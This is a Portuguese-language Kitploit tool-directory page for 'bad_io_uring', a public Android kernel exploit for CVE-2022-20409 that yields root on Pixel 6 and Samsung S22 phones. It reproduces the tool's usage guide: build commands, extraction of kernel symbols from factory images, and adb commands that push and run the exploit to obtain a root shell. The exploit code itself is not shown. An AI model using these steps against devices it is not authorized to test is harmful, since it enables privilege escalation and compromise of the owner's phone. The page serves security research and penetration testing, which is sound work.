Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
bad_io_uring — Exploração do kernel Android para CVE-2022-20409 | Kitploit
Ferramentas/GitHubGitHub/markakd/bad_io_uring
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança MóvelExploração de Binários
GitHubmarkakd/bad_io_uring

bad_io_uring

Exploração do kernel Android para CVE-2022-20409

Ver Repositório
21330há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Bad IO_uring

https://www.blackhat.com/us-23/briefings/schedule/index.html#bad-io_uring-a-new-era-of-rooting-for-android-32243

Construir o exploit

Certifique-se de que o Android NDK está instalado. Para o pixel 6,

root@kitploit:~
make pixel

Para o samsung s22,

root@kitploit:~
make s22

Como usar o exploit

O exploit foi escrito para suportar diferentes versões de kernels. Para portar o exploit para um kernel diferente, você precisa extrair o arquivo de símbolos do kernel de destino.

O kernel pode ser extraído da imagem de fábrica do telefone. Para os Pixels, baixe a imagem de fábrica aqui.

Depois de baixar a imagem, extraia a imagem para obter o arquivo boot.img. O boot.img pode ser extraído com tools/unpack_bootimg.py.

root@kitploit:~
python3 tools/unpack_bootimg.py --boot_img boot.img --out out

Você verá o kernel em out/kernel

Agora, com a imagem do kernel, podemos usar vmlinux-to-elf para extrair os símbolos do kernel dela.

root@kitploit:~
./tools/vmlinux-to-elf/kallsyms-finder out/kernel > pixel.kallsyms

Você precisa garantir que a Version string extraída no símbolo corresponda à versão do kernel do seu telefone. A versão do kernel do telefone pode ser consultada via adb. Por exemplo,

root@kitploit:~
sh-3.2$ adb shell
oriole:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

corresponde a

root@kitploit:~
[+] Version string: Linux version 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 (build-user@build-host) (Android (7284624, based on r416183b) clang version 12.0.5 (https://android.googlesource.com/toolchain/llvm-project c935d99d7cf2016289302412d708641d52d2f7ee), LLD 12.0.5 (/buildbot/src/android/llvm-toolchain/out/llvm-project/lld c935d99d7cf2016289302412d708641d52d2f7ee)) #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022

Agora você pode enviar o exploit e o arquivo de símbolos para o telefone e obter root com os seguintes comandos.

root@kitploit:~
make
adb push exp pixel.kallsyms /data/local/tmp
adb shell
cd /data/local/tmp
./exp pixel.kallsyms

Aproveite seu root shell :)

Baixar ferramenta